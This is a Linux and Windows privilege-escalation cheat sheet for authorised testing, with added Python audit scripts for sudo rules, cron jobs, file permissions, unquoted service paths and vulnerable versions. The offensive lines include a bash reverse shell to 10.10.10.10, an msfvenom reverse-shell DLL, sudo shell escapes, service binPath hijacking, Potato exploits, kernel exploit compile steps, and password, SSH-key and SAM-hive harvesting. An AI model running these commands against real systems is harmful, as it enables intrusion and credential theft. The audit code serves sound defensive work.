Comprehensive guide for Linux and Windows privilege escalation techniques
Authorized Testing Only
Use these techniques only in authorized environments. Unauthorized access is illegal.
Gather information about the Linux system

Check kernel version for known exploits
    uname -a

Identify OS distribution and version
    cat /etc/issue
    cat /etc/*-release

List processes running as root
    ps aux | grep root

Show active network connections
    netstat -antup
    ss -tunlp

List installed software
    dpkg -l    # Debian
    rpm -qa    # RedHat

Find misconfigured file permissions

Find all SUID executables
    find / -perm -4000 -type f 2>/dev/null

Find all SGID executables
    find / -perm -2000 -type f 2>/dev/null

Find world-writable files
    find / -perm -2 -type f 2>/dev/null

Check if password files are writable
    ls -la /etc/passwd
    ls -la /etc/shadow

Find writable configuration files
    find /etc -writable -type f 2>/dev/null
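
The five checks above are what a defender runs on a schedule to catch drift, not just what an attacker runs once. The following is an added example, not part of the original cheat sheet: it walks a directory tree with the same mode-bit tests as the find(1) commands (SUID, SGID, world-writable), compares SUID binaries against a baseline so known ones are not reported every run, and checks the password files for group/other write access. The baseline set and the directory layout built by demo() are constructed for illustration.

```python
import os
import shutil
import stat
import tempfile

# Constructed baseline of SUID binaries expected on the host. In practice this
# is generated from a known-good image of the same distribution and release.
BASELINE_SUID = {"/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/su"}


def audit_tree(root, baseline_suid=BASELINE_SUID):
    """Walk `root` and return sorted (finding, path) pairs for regular files that
    are SUID but absent from the baseline, SGID, or world-writable. Mirrors the
    three find(1) commands above, with a baseline added."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: do not follow symlinks
            except OSError:
                continue  # unreadable entry, the 2>/dev/null case
            if not stat.S_ISREG(st.st_mode):
                continue
            mode = st.st_mode
            if mode & stat.S_ISUID and path not in baseline_suid:
                findings.append(("suid_not_in_baseline", path))
            if mode & stat.S_ISGID:
                findings.append(("sgid", path))
            if mode & stat.S_IWOTH:
                findings.append(("world_writable", path))
    return sorted(findings)


def writable_by_non_owner(path):
    """True if group or others have write permission on `path`, which is the
    check the `ls -la /etc/passwd` / `ls -la /etc/shadow` step makes by eye."""
    mode = os.stat(path).st_mode
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))


def demo():
    """Build a constructed directory tree, audit it and return the findings with
    paths relative to the tree root plus the password-file check results."""
    root = tempfile.mkdtemp(prefix="permaudit-")
    try:
        layout = {
            "usr/bin/passwd": 0o4755,   # SUID, but in the baseline
            "usr/bin/helper": 0o4755,   # SUID and not in the baseline
            "usr/bin/wall": 0o2755,     # SGID
            "etc/app.conf": 0o666,      # world-writable config
            "etc/passwd": 0o644,        # correct
            "etc/shadow": 0o620,        # group-writable: wrong
        }
        for rel, mode in layout.items():
            full = os.path.join(root, rel)
            os.makedirs(os.path.dirname(full), exist_ok=True)
            with open(full, "w") as fh:
                fh.write("constructed\n")
            os.chmod(full, mode)
        baseline = {os.path.join(root, "usr/bin/passwd")}
        findings = [(k, os.path.relpath(p, root)) for k, p in audit_tree(root, baseline)]
        sensitive = {
            rel: writable_by_non_owner(os.path.join(root, rel))
            for rel in ("etc/passwd", "etc/shadow")
        }
        return findings, sensitive
    finally:
        shutil.rmtree(root, ignore_errors=True)
```

Run audit_tree("/") as root from cron and diff the result against the previous run; a new entry under suid_not_in_baseline or world_writable is the signal worth alerting on. Note that the check uses lstat, so a symlink to a SUID binary is not itself reported.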

Exploit sudo misconfigurations

List commands user can run with sudo
    sudo -l

Check for vulnerable sudo version
    sudo -V

Exploit sudo binaries via GTFOBins
    sudo vim -c '!sh'
    sudo find . -exec /bin/sh \; -quit

Preserve environment with sudo
    sudo -E /usr/bin/env /bin/sh

Hijack libraries with LD_PRELOAD
    sudo LD_PRELOAD=/tmp/shell.so program
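
Every technique in this section corresponds to a line in `sudo -l` output that an auditor can flag before anyone abuses it: a shell-escape binary such as vim or find, an unrestricted ALL, a NOPASSWD or SETENV tag, or an env_keep entry that lets LD_PRELOAD survive env_reset. The following is an added example, not part of the original cheat sheet: a parser for `sudo -l` output and an audit over it. The sample output for user "alice" on host "web01" is constructed, and the binary list is a short illustrative subset of GTFOBins.

```python
import re

# Binaries the cheat sheet itself escapes from (vim, find, env) plus a few other
# well-known shell-escape binaries; the authoritative list is GTFOBins.
SHELL_ESCAPE_BINARIES = {"vim", "vi", "find", "env", "less", "more", "awk", "bash", "sh"}
# Variables that must not survive env_reset; LD_PRELOAD is the one the page uses.
DANGEROUS_ENV_VARS = {"LD_PRELOAD", "LD_LIBRARY_PATH", "PYTHONPATH", "PERL5LIB"}

# One sudoers rule as printed by `sudo -l`: "(runas) TAG: TAG: command args"
RULE_RE = re.compile(r"^\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+)$")

# Constructed `sudo -l` output for a hypothetical user "alice" on host "web01".
SAMPLE_SUDO_L = """\
Matching Defaults entries for alice on web01:
    env_reset, mail_badpass, env_keep+=LD_PRELOAD,
    secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User alice may run the following commands on web01:
    (ALL) NOPASSWD: /usr/bin/vim
    (root) /usr/bin/find
    (root) /usr/bin/systemctl status nginx
    (ALL : ALL) ALL
"""


def parse_sudo_l(output):
    """Split `sudo -l` output into a list of Defaults entries and a list of
    (runas, tags, command) rules."""
    defaults, rules = [], []
    section = None
    for raw in output.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("Matching Defaults"):
            section = "defaults"
            continue
        if "may run the following commands" in line:
            section = "rules"
            continue
        if section == "defaults":
            defaults.extend(d.strip() for d in line.split(",") if d.strip())
        elif section == "rules":
            m = RULE_RE.match(line)
            if m:
                tags = {t.rstrip(":") for t in m.group("tags").split()}
                rules.append((m.group("runas").strip(), tags, m.group("cmd").strip()))
    return defaults, rules


def audit_sudo_l(output):
    """Return (finding, detail) pairs for the misconfigurations this section
    exploits: dangerous env_keep entries, shell-escape binaries, unrestricted
    ALL, and NOPASSWD / SETENV tags."""
    defaults, rules = parse_sudo_l(output)
    findings = []
    for d in defaults:
        if d.startswith("env_keep") and "=" in d:
            kept = set(re.findall(r"[A-Z][A-Z0-9_]*", d.split("=", 1)[1]))
            for var in sorted(kept & DANGEROUS_ENV_VARS):
                findings.append(("env_keep_dangerous", var))
        elif d == "!env_reset":
            findings.append(("env_reset_disabled", d))
    for _runas, tags, cmd in rules:
        if cmd == "ALL":
            findings.append(("unrestricted_all", cmd))
        elif cmd.split()[0].rsplit("/", 1)[-1] in SHELL_ESCAPE_BINARIES:
            findings.append(("shell_escape_binary", cmd))
        if "NOPASSWD" in tags:
            findings.append(("nopasswd", cmd))
        if "SETENV" in tags:
            findings.append(("setenv", cmd))
    return findings
```

Feed it the captured output of `sudo -l -U <user>` for each account on the host; an empty result for a non-admin account is the expected state. The fix for a flagged rule is usually to restrict it to a wrapper script with fixed arguments rather than to the bare interpreter or editor.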

Exploit scheduled tasks

List all cron jobs
    crontab -l
    ls -la /etc/cron*
    cat /etc/crontab

Check cron directory permissions
    ls -la /etc/cron.d
    ls -la /var/spool/cron

Find writable cron scripts
    find /etc/cron* -type f -writable 2>/dev/null

Hijack PATH in cron scripts
    echo "bash -i >& /dev/tcp/10.10.10.10/4444 0>&1" > /tmp/script.sh
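
The two conditions this section relies on are a cron script that a non-root user can overwrite and a job command given without a path, which cron resolves through the crontab's own PATH. The following is an added example, not part of the original cheat sheet: it parses /etc/crontab-style tables (and `crontab -l` output with system=False), then flags writable scripts, relative commands, and world-writable PATH directories. The crontab text and the temporary directory tree in demo() are constructed.

```python
import os
import shutil
import stat
import tempfile


def parse_crontab(text, system=True):
    """Return (env, jobs) from crontab text. system=True for /etc/crontab and
    /etc/cron.d files, which carry a user field; False for `crontab -l` output.
    jobs is a list of (user, command); user is None for per-user tables."""
    env, jobs = {}, []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if "=" in line.split(None, 1)[0]:          # NAME=value line, e.g. PATH=
            key, _, value = line.partition("=")
            env[key.strip()] = value.strip().strip('"')
            continue
        nfields = (1 if line.startswith("@") else 5) + (1 if system else 0)
        parts = line.split(None, nfields)
        if len(parts) != nfields + 1:
            continue                                # no command: malformed line
        jobs.append((parts[-2] if system else None, parts[-1]))
    return env, jobs


def writable_by_non_owner(path):
    """True if group or others may write to `path`."""
    return bool(os.stat(path).st_mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit_crontab(text, system=True):
    """Flag a job script that a non-owner can overwrite, a command given without
    a path (resolved through the crontab's PATH), and writable PATH directories.
    A production version would also require root ownership of each file."""
    env, jobs = parse_crontab(text, system)
    path_dirs = env.get("PATH", "/usr/bin:/bin").split(":")
    findings = []
    for _user, command in jobs:
        first = command.split()[0]
        if "/" in first:
            candidates = [first]
        else:
            findings.append(("relative_command", first))
            candidates = [os.path.join(d, first) for d in path_dirs]
        for cand in candidates:
            if os.path.isfile(cand) and writable_by_non_owner(cand):
                findings.append(("writable_script", cand))
    for d in path_dirs:
        if os.path.isdir(d) and writable_by_non_owner(d):
            findings.append(("writable_path_dir", d))
    return findings


def demo():
    """Constructed /etc/crontab-style table over a temporary tree; returns the
    findings with paths made relative to that tree."""
    root = tempfile.mkdtemp(prefix="cronaudit-")
    try:
        files = {"opt/backup/run.sh": 0o777, "bin/start-agent": 0o755}
        dirs = {"bin": 0o755, "dropbin": 0o777}     # dropbin: world-writable PATH dir
        for rel in dirs:
            os.makedirs(os.path.join(root, rel), exist_ok=True)
        for rel, mode in files.items():
            full = os.path.join(root, rel)
            os.makedirs(os.path.dirname(full), exist_ok=True)
            with open(full, "w") as fh:
                fh.write("#!/bin/sh\n")
            os.chmod(full, mode)
        for rel, mode in dirs.items():
            os.chmod(os.path.join(root, rel), mode)
        crontab = f"""\
PATH={root}/bin:{root}/dropbin
# m h dom mon dow user command
*/5 * * * * root {root}/opt/backup/run.sh
0 3 * * * root backup-rotate --keep 7
@reboot root {root}/bin/start-agent
"""
        return [(k, os.path.relpath(p, root) if p.startswith(root) else p)
                for k, p in audit_crontab(crontab, system=True)]
    finally:
        shutil.rmtree(root, ignore_errors=True)
```

Run it over /etc/crontab and every file in /etc/cron.d, and over `crontab -l -u <user>` with system=False for per-user tables. The remediation for a relative_command finding is an absolute path in the job line; for a writable_script finding it is root ownership and mode 0755 or tighter.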

Common kernel privilege escalation exploits

CVE-2016-5195 - Race condition exploit (Dirty COW)
    gcc -pthread dirty.c -o dirty -lcrypt

CVE-2022-0847 - Overwrite any file (Dirty Pipe)
    gcc dirty_pipe.c -o exploit

CVE-2021-4034 - pkexec vulnerability (PwnKit)
    gcc pwnkit.c -o exploit

CVE-2021-3156 - sudo heap overflow (Baron Samedit)
    sudoedit -s /
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...    # long run of 'A' characters, shortened here
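
From the defender's side, the `sudo -V` step in the sudo section and the CVE list above reduce to one question: is the installed version inside a known-affected range? The following is an added example, not part of the original cheat sheet. It parses `sudo -V` and `uname -r` output and applies the upstream ranges for CVE-2021-3156 (legacy 1.8.2 through 1.8.31p2, stable 1.9.0 through 1.9.5p1, as stated in the Qualys advisory) and CVE-2022-0847 (introduced in 5.8, fixed in 5.10.102, 5.15.25 and 5.16.11). Distributions backport fixes without changing the upstream version string, so a True result is a candidate for checking the package changelog, not a verdict.

```python
import re

# Upstream dotted version with sudo's optional "pN" patch-level suffix.
VERSION_RE = re.compile(r"(\d+)\.(\d+)(?:\.(\d+))?(?:p(\d+))?")


def parse_version(text):
    """Extract the first version from `sudo -V` or `uname -r` output as a
    comparable tuple (major, minor, micro, patch); 1.9.5p1 -> (1, 9, 5, 1)."""
    m = VERSION_RE.search(text)
    if not m:
        raise ValueError(f"no version found in {text!r}")
    return tuple(int(x) if x else 0 for x in m.groups())


def sudo_vulnerable_cve_2021_3156(sudo_v_output):
    """True if the upstream sudo version lies in the affected ranges:
    legacy 1.8.2 .. 1.8.31p2 or stable 1.9.0 .. 1.9.5p1."""
    v = parse_version(sudo_v_output)
    return (1, 8, 2, 0) <= v <= (1, 8, 31, 2) or (1, 9, 0, 0) <= v <= (1, 9, 5, 1)


# First release of each maintained stable branch that carries the Dirty Pipe fix.
DIRTY_PIPE_FIXED = {(5, 10): (5, 10, 102), (5, 15): (5, 15, 25), (5, 16): (5, 16, 11)}


def kernel_vulnerable_cve_2022_0847(uname_r_output):
    """True if the upstream kernel version is 5.8 or later and older than the
    fix for its branch. Branches between 5.8 and 5.16 that never received an
    upstream fix (5.8 .. 5.14, which are end-of-life) are reported as affected."""
    v = parse_version(uname_r_output)[:3]
    if v < (5, 8, 0) or v >= (5, 17, 0):
        return False
    fixed = DIRTY_PIPE_FIXED.get(v[:2])
    return fixed is None or v < fixed


def version_report(sudo_v_output, uname_r_output):
    """Summarise both checks for an inventory script."""
    return {
        "sudo": parse_version(sudo_v_output),
        "CVE-2021-3156_candidate": sudo_vulnerable_cve_2021_3156(sudo_v_output),
        "kernel": parse_version(uname_r_output)[:3],
        "CVE-2022-0847_candidate": kernel_vulnerable_cve_2022_0847(uname_r_output),
    }
```

For a host inventory, pair each candidate with the package version from `dpkg -s sudo` or `rpm -q sudo` and the distribution's security tracker before raising a ticket; an Ubuntu 22.04 kernel reports 5.15.0 in `uname -r` while carrying the backported fix.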

Gather information about Windows system

Get system info and installed patches
    systeminfo
    wmic qfe list

Get current user privileges
    whoami /all
    net user %username%

List local users and admins
    net user
    net localgroup administrators

List all services
    sc query state= all
    wmic service list brief

List all scheduled tasks
    schtasks /query /fo LIST /v

Exploit Windows services for privilege escalation

Find unquoted service paths
    wmic service get name,pathname,displayname,startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """

Find services with weak permissions
    accesschk.exe -uwcqv "Everyone" *
    accesschk.exe -uwcqv "Authenticated Users" *

Change service binary path
    sc config ServiceName binPath= "C:\temp\shell.exe"
    sc stop ServiceName
    sc start ServiceName

Query service registry keys
    reg query HKLM\SYSTEM\CurrentControlSet\Services
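
The three findstr filters in the unquoted-path check are easy to reproduce in a script that runs across a fleet and emits the corrected binPath for each finding. The following is an added example, not part of the original cheat sheet: it parses the column output of `wmic service get name,pathname,displayname,startmode`, applies the same three conditions (auto-start, unquoted, outside C:\Windows) plus the requirement that the path actually contains a space, and produces the quoted form an administrator would set with `sc config`. The wmic output is constructed; wmic is deprecated on current Windows, where `Get-CimInstance Win32_Service` in PowerShell returns the same Name, PathName and StartMode properties.

```python
import re

# Constructed `wmic service get name,pathname,displayname,startmode` output.
# wmic prints the requested columns alphabetically, padded with spaces.
SAMPLE_WMIC = r"""
DisplayName         Name         PathName                                          StartMode
Acme Backup Agent   AcmeBackup   C:\Program Files\Acme Backup\agent.exe -service   Auto
Acme Updater        AcmeUpdate   "C:\Program Files\Acme\update.exe" -service       Auto
Windows Update      wuauserv     C:\Windows\system32\svchost.exe -k netsvcs        Manual
Print Spooler       Spooler      C:\Windows\System32\spoolsv.exe                   Auto
Tools Service       ToolsSvc     C:\Tools\svc.exe                                  Auto
"""

# Columns are separated by two or more spaces; PathName may contain single spaces.
ROW_RE = re.compile(
    r"^(?P<display>.+?)\s{2,}(?P<name>\S+)\s{2,}(?P<path>.+?)\s{2,}"
    r"(?P<start>Auto|Manual|Disabled|Boot|System)\s*$"
)


def parse_wmic_services(output):
    """Return one dict (display, name, path, start) per service row."""
    rows = []
    for line in output.splitlines():
        if not line.strip() or line.startswith("DisplayName"):
            continue
        m = ROW_RE.match(line.rstrip())
        if m:
            rows.append(m.groupdict())
    return rows


def is_unquoted_with_spaces(path):
    """The cheat sheet's findstr filters as one predicate: the image path is
    unquoted, contains a space, and lives outside C:\\Windows."""
    p = path.strip()
    return (not p.startswith('"')
            and " " in p
            and not p.lower().startswith("c:\\windows\\"))


def find_unquoted_service_paths(output):
    """Auto-start services whose PathName needs quoting, as (name, path)."""
    return [(r["name"], r["path"]) for r in parse_wmic_services(output)
            if r["start"] == "Auto" and is_unquoted_with_spaces(r["path"])]


def quoted_path(path):
    """Remediation helper: quote the executable part of an unquoted PathName.
    Assumes the executable ends at the first '.exe' (a simplification; confirm
    against the real image before running `sc config <name> binPath= ...`)."""
    m = re.match(r"(?i)(.+?\.exe)(.*)$", path.strip())
    if not m:
        return path
    exe, rest = m.groups()
    return f'"{exe}"{rest}'
```

The output of find_unquoted_service_paths is the list to hand to whoever owns the service; the fix is a quoted binPath, and the directories along the unquoted path should in any case not be writable by standard users.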

Exploit registry misconfigurations

Check if MSI packages run as SYSTEM
    reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
    reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

Find autorun programs
    reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
    reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run

Find writable registry keys
    accesschk.exe /accepteula -uvwqk HKLM\Software

Exploit Windows access tokens

List current token privileges
    whoami /priv

Exploit SeImpersonate with JuicyPotato
    JuicyPotato.exe -l 1337 -p C:\windows\system32\cmd.exe -t * -c {CLSID}

Exploit print spooler service
    PrintSpoofer.exe -i -c cmd

Alternative to JuicyPotato for newer Windows
    RoguePotato.exe -r 10.10.10.10 -e "cmd.exe" -l 9999

Exploit DLL search order

Monitor application for DLL loads
    procmon.exe    # Process Monitor to find missing DLLs

Find writable application directories
    icacls "C:\Program Files\Application"    # lists the ACL; (F), (M) or (W) for Everyone or Users means writable

Generate payload DLL
    msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f dll -o evil.dll

Find stored passwords

Search for password files
    grep -ri "password" /home 2>/dev/null
    find / -name "*password*" 2>/dev/null

List stored credentials
    cmdkey /list
    reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

Find SSH private keys
    find / -name "id_rsa" -o -name "id_dsa" 2>/dev/null

Check command history for passwords
    cat ~/.bash_history
    cat ~/.mysql_history

Dump Windows password hashes
    reg save HKLM\SAM sam.hive
    reg save HKLM\SYSTEM system.hive